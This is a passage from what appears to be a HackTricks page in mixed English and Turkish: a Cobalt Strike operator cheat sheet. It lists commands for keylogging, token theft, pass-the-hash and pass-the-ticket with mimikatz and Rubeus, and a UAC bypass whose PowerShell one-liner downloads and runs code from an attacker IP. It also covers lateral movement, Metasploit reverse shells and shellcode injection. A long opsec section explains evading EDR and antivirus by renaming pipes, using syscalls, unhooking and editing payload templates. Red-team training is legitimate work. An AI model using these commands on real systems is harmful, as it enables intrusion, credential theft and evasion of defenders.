Screenshots

printscreen # Take a single screenshot via PrintScr method screenshot # Take a single screenshot screenwatch # Take periodic screenshots of desktop

Go to View -> Screenshots to see them

keylogger

keylogger [pid] [x86|x64]

View > Keystrokes to see the keys pressed

portscan

portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Inject portscan action inside another process portscan [targets] [ports] [arp|icmp|none] [max connections]

Powershell

Import Powershell module

powershell-import C:\path\to\PowerView.ps1 powershell-import /root/Tools/PowerSploit/Privesc/PowerUp.ps1 powershell # This uses the highest supported powershell version (not oppsec) powerpick # This creates a sacrificial process specified by spawnto, and injects UnmanagedPowerShell into it for better opsec (not logging) powerpick Invoke-PrivescAudit | fl psinject # This injects UnmanagedPowerShell into the specified process to run the PowerShell cmdlet.

User impersonation

Token generation with creds

make_token [DOMAIN\user] [password] #Create token to impersonate a user in the network ls \computer_name\c$ # Try to use generated token to access C$ in a computer rev2self # Stop using token generated with make_token

The use of make_token generates event 4624: An account was successfully logged on. This event is very common in a Windows domain, but can be narrowed down by filtering on the Logon Type. As mentioned above, it uses LOGON32_LOGON_NEW_CREDENTIALS which is type 9.

UAC Bypass

elevate svc-exe elevate uac-token-duplication runasadmin uac-cmstplua powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://10.10.5.120:80/b’))”

Steal token from pid

Like make_token but stealing the token from a process

steal_token [pid] # Also, this is useful for network actions, not local actions

From the API documentation we know that this logon type “allows the caller to clone its current token”. This is why the Beacon output says Impersonated <current_username> - it’s impersonating our own cloned token.

ls \computer_name\c$ # Try to use generated token to access C$ in a computer rev2self # Stop using token from steal_token

## Launch process with nwe credentials spawnas [domain\username] [password] [listener] #Do it from a directory with read access like: cd C:\

Like make_token, this will generate Windows event 4624: An account was successfully logged on but with a logon type of 2 (LOGON32_LOGON_INTERACTIVE). It will detail the calling user (TargetUserName) and the impersonated user (TargetOutboundUserName).

Inject into process

inject [pid] [x64|x86] [listener]

From an OpSec point of view: Don’t perform cross-platform injection unless you really have to (e.g. x86 -> x64 or x64 -> x86).

Pass the hash

This modification process requires patching of LSASS memory which is a high-risk action, requires local admin privileges and not all that viable if Protected Process Light (PPL) is enabled.

pth [pid] [arch] [DOMAIN\user] [NTLM hash] pth [DOMAIN\user] [NTLM hash]

Pass the hash through mimikatz

mimikatz sekurlsa::pth /user: /domain: /ntlm: /run:“powershell -w hidden”

Withuot /run, mimikatz spawn a cmd.exe, if you are running as a user with Desktop, he will see the shell (if you are running as SYSTEM you are good to go)

steal_token #Steal token from process created by mimikatz

Pass the ticket

Request a ticket

execute-assembly /root/Tools/SharpCollection/Seatbelt.exe -group=system execute-assembly C:\path\Rubeus.exe asktgt /user: /domain: /aes256:<aes_keys> /nowrap /opsec

Create a new logon session to use with the new ticket (to not overwrite the compromised one)

make_token <username> DummyPass

Write the ticket in the attacker machine from a poweshell session & load it

[System.IO.File]::WriteAllBytes(“C:\Users\Administrator\Desktop\jkingTGT.kirbi”, [System.Convert]::FromBase64String(“[…ticket…]”)) kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi

Pass the ticket from SYSTEM

Generate a new process with the ticket

execute-assembly C:\path\Rubeus.exe asktgt /user: /domain: /aes256: /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe

Steal the token from that process

steal_token

Extract ticket + Pass the ticket

List tickets

execute-assembly C:\path\Rubeus.exe triage

Dump insteresting ticket by luid

execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid: /nowrap

Create new logon session, note luid and processid

execute-assembly C:\path\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe

Insert ticket in generate logon session

execute-assembly C:\path\Rubeus.exe ptt /luid:0x92a8c /ticket:[…base64-ticket…]

Finally, steal the token from that new process

steal_token

# Lateral Movement

If a token was created it will be used

jump [method] [target] [listener]

Methods:

psexec x86 Use a service to run a Service EXE artifact

psexec64 x64 Use a service to run a Service EXE artifact

## psexec_psh x86 Use a service to run a PowerShell one-liner ## winrm x86 Run a PowerShell script via WinRM ## winrm64 x64 Run a PowerShell script via WinRM

wmi_msbuild x64 wmi lateral movement with msbuild inline c# task (oppsec)

remote-exec [method] [target] [command] # remote-exec doesn’t return output

Methods:

## psexec Remote execute via Service Control Manager ## winrm Remote execute via WinRM (PowerShell) ## wmi Remote execute via WMI

To execute a beacon with wmi (it isn’t in the jump command) just upload the beacon and execute it

beacon> upload C:\Payloads\beacon-smb.exe beacon> remote-exec wmi srv-1 C:\Windows\beacon-smb.exe

Pass session to Metasploit - Through listener

On metaploit host

msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http msf6 exploit(multi/handler) > set LHOST eth0 msf6 exploit(multi/handler) > set LPORT 8080 msf6 exploit(multi/handler) > exploit -j

On cobalt: Listeners > Add and set the Payload to Foreign HTTP. Set the Host to 10.10.5.120, the Port to 8080 and click Save.

beacon> spawn metasploit

You can only spawn x86 Meterpreter sessions with the foreign listener.

Pass session to Metasploit - Through shellcode injection

On metasploit host

msfvenom -p windows/x64/meterpreter_reverse_http LHOST= LPORT= -f raw -o /tmp/msf.bin

Run msfvenom and prepare the multi/handler listener

Copy bin file to cobalt strike host

ps shinject x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 process

Pass metasploit session to cobalt strike

Fenerate stageless Beacon shellcode, go to Attacks > Packages > Windows Executable (S), select the desired listener, select Raw as the Output type and select Use x64 payload.

Use post/windows/manage/shellcode_inject in metasploit to inject the generated cobalt srike shellcode

Pivoting

Open a socks proxy in the teamserver

beacon> socks 1080

SSH connection

beacon> ssh 10.10.17.12:22 username password

</details>

### Custom implants / Linux Beacons

- A custom agent only needs to speak the Cobalt Strike Team Server HTTP/S protocol (default malleable C2 profile) to register/check-in and receive tasks. Implement the same URIs/headers/metadata crypto defined in the profile to reuse the Cobalt Strike UI for tasking and output.
- An Aggressor Script (e.g., `CustomBeacon.cna`) can wrap payload generation for the non-Windows beacon so operators can select the listener and produce ELF payloads directly from the GUI.
- Example Linux task handlers exposed to the Team Server: `sleep`, `cd`, `pwd`, `shell` (exec arbitrary commands), `ls`, `upload`, `download`, and `exit`. These map to task IDs expected by the Team Server and must be implemented server-side to return output in the proper format.
- BOF support on Linux can be added by loading Beacon Object Files in-process with [TrustedSec's ELFLoader](https://github.com/trustedsec/ELFLoader) (supports Outflank-style BOFs too), allowing modular post-exploitation to run inside the implant's context/privileges without spawning new processes.
- Embed a SOCKS handler in the custom beacon to keep pivoting parity with Windows Beacons: when the operator runs `socks <port>` the implant should open a local proxy to route operator tooling through the compromised Linux host into internal networks.

## Opsec

### Execute-Assembly

The **`execute-assembly`** uses a **sacrificial process** using remote process injection to execute the indicated program. This is very noisy as to inject inside a process certain Win APIs are used that every EDR is checking. However, there are some custom tools that can be used to load something in the same process:

- [https://github.com/anthemtotheego/InlineExecute-Assembly](https://github.com/anthemtotheego/InlineExecute-Assembly)
- [https://github.com/kyleavery/inject-assembly](https://github.com/kyleavery/inject-assembly)
- In Cobalt Strike you can also use BOF (Beacon Object Files): [https://github.com/CCob/BOF.NET](https://github.com/CCob/BOF.NET)

The agressor script `https://github.com/outflanknl/HelpColor` will create the `helpx` command in Cobalt Strike which will put colors in commands indicating if they are BOFs (green), if they are Frok&Run (yellow) and similar, or if they are ProcessExecution, injection or similar (red). Which helps to know which commands are more stealthy.

### Act as the user

You could check events like `Seatbelt.exe LogonEvents ExplicitLogonEvents PoweredOnEvents`:

- Security EID 4624 - Tüm etkileşimli oturum açmaları kontrol edin; böylece normal çalışma saatlerini öğrenebilirsiniz.
- System EID 12,13 - Kapanma/başlatma/uyku sıklığını kontrol edin.
- Security EID 4624/4625 - Gelen geçerli/geçersiz NTLM denemelerini kontrol edin.
- Security EID 4648 - Bu olay, düz metin kimlik bilgileri kullanılarak oturum açıldığında oluşturulur. Bir süreç tarafından üretilmişse, ikili muhtemelen yapılandırma dosyasında veya kod içinde kimlik bilgilerini açıkta tutuyordur.

When using `jump` from cobalt strike, it's better to use the `wmi_msbuild` method to make the new process look more legit.

### Use computer accounts

It's common for defenders to be checking weird behaviours generated from users abd **exclude service accounts and computer accounts like `*$` from their monitoring**. You could use these accounts to perform lateral movement or privilege escalation.

### Use stageless payloads

Stageless payloads are less noisy than staged ones because they don't need to download a second stage from the C2 server. This means that they don't generate any network traffic after the initial connection, making them less likely to be detected by network-based defenses.

### Tokens & Token Store

Be careful when you steal or generate tokens because it might be posisble for an EDR to enumerate all the tokens of all the threads and find a **token belonging to a different user** or even SYSTEM in the process.

This allows to store tokens **per beacon** so it's not needed to steal the same token again and again. This is useful for lateral movement or when you need to use a stolen token multiple times:

- token-store steal <pid>
- token-store steal-and-use <pid>
- token-store show
- token-store use <id>
- token-store remove <id>
- token-store remove-all

When moving laterally, usually is better to **steal a token than to generate a new one** or perform a pass the hash attack.

### Guardrails

Cobalt Strike has a feature called **Guardrails** that helps to prevent the use of certain commands or actions that could be detected by defenders. Guardrails can be configured to block specific commands, such as `make_token`, `jump`, `remote-exec`, and others that are commonly used for lateral movement or privilege escalation.

Moreover, the repo [https://github.com/Arvanaghi/CheckPlease/wiki/System-Related-Checks](https://github.com/Arvanaghi/CheckPlease/wiki/System-Related-Checks) also contains some checks and ideas you could consider before executing a payload.

### Tickets encryption

In an AD be careful with the encryption of the tickets. By default, some tools will use RC4 encryption for Kerberos tickets, which is less secure than AES encryption and by default up to date environments will use AES. This can be detected by defenders who are monitoring for weak encryption algorithms.

### Avoid Defaults

When using Cobalt Stricke by default the SMB pipes will have the name `msagent_####` and `"status_####`. Change those names. It's possible to check the names of the existing pipes from Cobal Strike with the command: `ls \\.\pipe\`

Moreover, with SSH sessions a pipe called `\\.\pipe\postex_ssh_####` is created. Chage it with `set ssh_pipename "<new_name>";`.

Also in poext exploitation attack the pipes `\\.\pipe\postex_####` can be modified with `set pipename "<new_name>"`.

In Cobalt Strike profiles you can also modify things like:

- Avoiding using `rwx`
- How the process injection behavior works (which APIs will be used) in the `process-inject {...}` block
- How the "fork and run" works in the `post-ex {…}` block
- The sleep time
- The max size of binaries to be loaded in memory
- The memory footprint and DLL content with `stage {...}` block
- The network traffic

### Bypass memory scanning

Some EDRs scan memory for some known malware signatures. Coblat Strike allows to modify the `sleep_mask` function as a BOF that will be able to encrypt in memory the bacldoor.

### Noisy proc injections

When injecting code into a process this is usually very noisy, this is because **no regular process usually performs this action and because the ways to do this are very limited**. Tehrefore, it' could be detected by behaviour-based detection systems. Moroever, it could also be detected by EDRs scanning the network for **threads containing code that is not in disk** (although processes such as browsers using JIT have this commonly). Example: [https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2](https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2)

### Spawnas | PID and PPID relationships

When spawning a new process it's important to **maintain a regular parent-child** relationship between processes to avoid detection. If svchost.exec is executing iexplorer.exe it'll look suspicious, as svchost.exe is not a parent of iexplorer.exe in a normal Windows environment.

When a new beacon is spawned in Cobalt Strike by default a process using **`rundll32.exe`** is created to run the new listener. This is not very stealthy and can be easily detected by EDRs. Moreover, `rundll32.exe` is run without any args making it even more suspicious.

With the following Cobalt Strike command, you can specify a different process to spawn the new beacon, making it less detectable:
```bash
spawnto x86 svchost.exe

You can also change this setting spawnto_x86 and spawnto_x64 in a profile.

Saldırgan trafiğinin proxy’lenmesi

Saldırganların bazen araçları lokal olarak çalıştırabilmesi gerekir, hatta Linux makinelerde, ve kurbanların trafiğinin araca ulaşmasını sağlamaları gerekir (ör. NTLM relay).

Ayrıca, bazen pass-the.hash veya pass-the-ticket saldırısı yapmak için saldırganın kendi LSASS process’ine bu hash’i veya ticket’ı lokal olarak ekleyip ondan pivot yapması, kurban makinenin LSASS process’ini değiştirmekten daha gizli olabilir.

Ancak oluşturulan trafik konusunda dikkatli olmalısınız; backdoor process’inizden olağandışı trafik (kerberos?) gönderiyor olabilirsiniz. Bunun için bir browser process’ine pivot yapabilirsiniz (ancak bir sürece kendinizi inject etme sırasında yakalanabilirsiniz, bu yüzden bunu yapmanın gizli bir yolunu düşünün).

Avoiding AVs

AV/AMSI/ETW Bypass

Check the page:

Antivirus (AV) Bypass

Artifact Kit

Usually in /opt/cobaltstrike/artifact-kit you can find the code and pre-compiled templates (in /src-common) of the payloads that cobalt strike is going to use to generate the binary beacons.

Using ThreatCheck with the generated backdoor (or just with the compiled template) you can find what is making defender trigger. It’s usually a string. Therefore you can just modify the code that is generating the backdoor so that string doesn’t appear in the final binary.

After modifying the code just run ./build.sh from the same directory and copy the dist-pipe/ folder into the Windows client in C:\Tools\cobaltstrike\ArtifactKit.

pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .

Cobalt Strike’ın, istediğimiz diskten kaynakları kullanmasını ve yüklü olanları kullanmamasını belirtmek için agresif script dist-pipe\artifact.cna’ı yüklemeyi unutmayın.

Kaynak Kiti

ResourceKit klasörü, PowerShell, VBA ve HTA dahil olmak üzere Cobalt Strike’ın script-based payloadları için şablonlar içerir.

Şablonlarla birlikte ThreatCheck’i kullanarak defender’ın (bu durumda AMSI) neleri beğenmediğini bulup bunları değiştirebilirsiniz:

.\ThreatCheck.exe -e AMSI -f .\cobaltstrike\ResourceKit\template.x64.ps1

Tespit edilen satırları değiştirerek yakalanmayacak bir şablon oluşturabilirsiniz.

Agresif script ResourceKit\resources.cna’yı yüklemeyi unutmayın; böylece Cobalt Strike’a yüklenenler yerine diskten istediğimiz kaynakları kullanmasını belirtmiş oluruz.

Function hooks | Syscall

Function hooking, ERDs’in kötü amaçlı etkinliği tespit etmek için çok yaygın bir yöntemdir. Cobalt Strike, standart Windows API çağrıları yerine syscalls kullanarak bu hook’ları atlatmanıza izin verir (None konfigürasyonu), ya da bir fonksiyonun Nt* versiyonunu Direct ayarıyla kullanabilir, veya malleable profile içinde Nt* fonksiyonunun üzerinden atlamak için Indirect seçeneğini tercih edebilirsiniz. Sisteme bağlı olarak, bir seçenek diğerine göre daha gizli olabilir.

Bu, profile içinde veya syscall-method komutunu kullanarak ayarlanabilir.

Ancak bu aynı zamanda gürültülü olabilir.

Function hook’larını atlatmak için Cobalt Strike tarafından sağlanan seçeneklerden biri bu hook’ları kaldırmaktır: unhook-bof.

Hangi fonksiyonların hook’landığını şu araçlarla da kontrol edebilirsiniz: https://github.com/Mr-Un1k0d3r/EDRs veya https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector

</details>

## Kaynaklar

- [Cobalt Strike Linux Beacon (özel implant PoC)](https://github.com/EricEsquivel/CobaltStrike-Linux-Beacon)
- [TrustedSec ELFLoader & Linux BOFs](https://github.com/trustedsec/ELFLoader)
- [Outflank nix BOF şablonu](https://github.com/outflanknl/nix_bof_template)
- [Unit42'nin Cobalt Strike metadata şifreleme analizi](https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encryption-decryption/)
- [SANS ISC günlüğü: Cobalt Strike trafiği](https://isc.sans.edu/diary/27968)
- [cs-decrypt-metadata-py](https://blog.didierstevens.com/2021/10/22/new-tool-cs-decrypt-metadata-py/)
- [SentinelOne CobaltStrikeParser](https://github.com/Sentinel-One/CobaltStrikeParser)

> [!TIP]
> AWS Hacking'i öğrenin ve pratik yapın:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> GCP Hacking'i öğrenin ve pratik yapın: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Azure Hacking'i öğrenin ve pratik yapın: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>HackTricks'i Destekleyin</summary>
>
> - [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
> - **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** bizi **takip edin** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
>
> </details>